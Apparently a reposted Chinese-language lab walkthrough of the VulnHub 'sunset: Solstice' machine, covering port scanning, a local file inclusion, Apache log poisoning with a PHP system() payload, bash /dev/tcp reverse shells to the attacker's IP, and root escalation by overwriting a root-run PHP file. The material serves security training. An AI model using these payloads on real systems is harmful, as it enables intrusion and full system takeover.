sunset:Solstice靶场
sunset:Solsticehttps://www.vulnhub.com/entry/sunset-solstice,499/
1,将两台捏造机网络毗连都改为NAT模式
2,攻击机上做namp局域网扫描发现靶机
nmap -sn 192.168.23.0/24
https://i-blog.csdnimg.cn/direct/3621e135487f4e6d86a47b2de346000e.png
那么攻击机IP为192.168.23.182,靶场IP192.168.23.244
3,对靶机举行端口服务探测
nmap -sV -T4 -p- -A 192.168.23.244
https://i-blog.csdnimg.cn/direct/12f58c9a402c49239e64f16d87bee711.png
1. FTP服务分析(21/tcp, 2121/tcp, 62524/tcp)
pyftpdlib 1.5.6 (21/tcp, 2121/tcp):
[*]匿名登录答应(2121端口):实行登录 ftp://192.168.23.244:2121 用户名为 anonymous,空暗码。
[*]检查 pub 目次:ls -al 检察权限和文件。若可写,可上传反向Shell或测试文件。
[*]搜刮弊端:pyftpdlib 1.5.6 是否存在已知弊端(如CVE-2021-30800)。
FreeFloat ftpd 1.00 (62524/tcp):
[*]旧版本,大概存在缓冲区溢出弊端(如CVE-2010-4221)。利用 searchsploit freefloat 查找EXP。
2. SSH服务分析(22/tcp)
OpenSSH 7.9p1:
[*]检查版本是否有已知弊端(如CVE-2021-41617),但该版本较新,大概已修复。
[*]若获取根据,可实行登录。或通过其他服务(如FTP/SMB)泄漏的根据举行爆破。
3. SMTP服务分析(25/tcp)
Exim smtpd:
[*]利用 smtp-user-enum 或手动下令罗列用户:
telnet 192.168.23.244 25
VRFY root # 测试是否存在用户
[*]检查CVE-2019-15846(Exim 4.92.1以下长途代码实行),但需确认版本是否受影响。
4. HTTP服务分析(80/tcp, 8593/tcp, 54787/tcp)
Apache 2.4.38 (80/tcp):
[*]访问 http://192.168.23.244,检查页面内容。
[*]利用目次罗列工具:
gobuster dir -u http://192.168.23.244 -w /usr/share/wordlists/dirbuster/common.txt
PHP cli服务器 (8593/tcp, 54787/tcp):
[*]访问 http://192.168.23.244:8593 和 http://192.168.23.244:54787,检查应勤奋能。
[*]检查PHP版本弊端(7.3.14),如反序列化、文件包罗(?page=../../etc/passwd)。
5. SMB服务分析(139/tcp, 445/tcp)
Samba 4.9.5-Debian:
[*]罗列共享和用户:
smbclient -L 192.168.23.244 -N
enum4linux -a 192.168.23.244
[*]检查匿名访问共享:
smbclient \\\\192.168.23.244\\ -N
[*]测试CVE-2017-7494(Samba长途代码实行),但需设置答应写入共享。
6. Squid署理分析(3128/tcp)
Squid 4.6:
[*]测试署理是否开放:
curl -x http://192.168.23.244:3128 Example Domain
[*]若可用,用于扫描内网或访问受限资源。
4,21端口的ftp服务器登录失败,登录2121端口的ftp服务器乐成
ftp 192.168.23.244
https://i-blog.csdnimg.cn/direct/6ba4eb09fe7241eeb092d8167603e42e.png
ftp 192.168.23.244 2121
https://i-blog.csdnimg.cn/direct/39552ba3322a48efb16c0e3203ca60cf.png
再看看web服务的几个端口
http://192.168.23.244/
https://i-blog.csdnimg.cn/direct/0de8f0f12b8c4b7088a19d6146e2a251.png
http://192.168.23.244:8593/
https://i-blog.csdnimg.cn/direct/7625b25f94bf489392577b3557bcb12b.png
http://192.168.23.244:54787/
https://i-blog.csdnimg.cn/direct/864e669ca48143c596c422be8ea37244.png
5,经过测试这个网站存在本地文件包罗弊端
http://192.168.23.244:8593/index.php?book=../../../../../../etc/passwd
https://i-blog.csdnimg.cn/direct/06ba1728fdd946869b1a5163508c8460.png
那么就必要把这个本地文件包罗弊端利用起来,然后getshell。恰恰可以或许包罗
http://192.168.23.244:8593/index.php?book=../../../../../../../../../var/log/apache2/access.log
https://i-blog.csdnimg.cn/direct/f0dc217412494d22a2cd19f890268e03.png
利用nc污染日志
echo -e "GET / HTTP/1.1\r\nHost: 192.168.23.244\r\nUser-Agent: <?php system(\$_GET['cmd']); ?>\r\nConnection: close\r\n\r\n" | nc 192.168.23.244 80
https://i-blog.csdnimg.cn/direct/27bb08b6bcc14d7f88e0250921e82303.png
访问文件包罗网页确定弊端是否利用乐成
http://192.168.23.244:8593/index.php?book=../../../../../../../../../var/log/apache2/access.log&cmd=id
https://i-blog.csdnimg.cn/direct/8b5e70cfa2384044b0da17ad9883ad2e.png
弊端利用乐成,乐成实行了体系下令,接下来构造下令反弹shell(必要URL编码)
bash -c 'exec bash -i &>/dev/tcp/192.168.23.182/4444 <&1'
http://192.168.23.244:8593/index.php?book=../../../../../../../../../var/log/apache2/access.log&cmd=bash%20-c%20%27exec%20bash%20-i%20%26%3E/dev/tcp/192.168.23.182/4444%20%3C%261%27%0A
https://i-blog.csdnimg.cn/direct/aa60cd9de6484201b0d1a5a3b3421c25.png
利用kali接收来自靶机的shell
https://i-blog.csdnimg.cn/direct/2a4948d6e6b64302a987816d61a01026.png
6,信息收集一下
uname -a
cat /etc/*-release
getconf LONG_BIT
https://i-blog.csdnimg.cn/direct/86d380d3199349ee8e2feec285b50d0b.png
搜刮一下root用户可读可写的可实行文件
find / -type f -user root -perm -o=w 2>/dev/null | grep -v "/sys/" | grep -v "/proc/"
https://i-blog.csdnimg.cn/direct/2784809d98b745849d40ffec93f8fc15.png
检察一下这个文件
cat /var/tmp/sv/index.php
https://i-blog.csdnimg.cn/direct/4b6a49441ac14f48aebe5e7f1ec962ef.png
检察一下进程
ps -ef | grep "/var/tmp/sv"
https://i-blog.csdnimg.cn/direct/21f7d94cb1c14630a7ff02520f5b47e0.png
发现有一个进程利用php解释器实行/var/tmp/sv,利用ehco写入木马构造恶意php文件
echo "<?php" > /var/tmp/sv/index.php && echo "echo \"Under construction\";" >> /var/tmp/sv/index.php && echo "exec(\"/bin/bash -c 'bash -i >& /dev/tcp/192.168.23.182/8888 0>&1'\");" >> /var/tmp/sv/index.php && echo "?>" >> /var/tmp/sv/index.php
cat /var/tmp/sv/index.php
https://i-blog.csdnimg.cn/direct/3691e697cefd4385975450b77e4ea24b.png
靶机上通过nc访问运行这个进程的57端口,并哀求/index.php文件
cd /tmp
curl localhost:57
https://i-blog.csdnimg.cn/direct/663ce83d83ad4ca9a784e155afbabec6.png
然后kali开启对8888端口的监听
nc -lvvp 8888
https://i-blog.csdnimg.cn/direct/5bf368fe1f6f49a199901108fe279155.png
乐成提权成为root用户,拿到flag
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]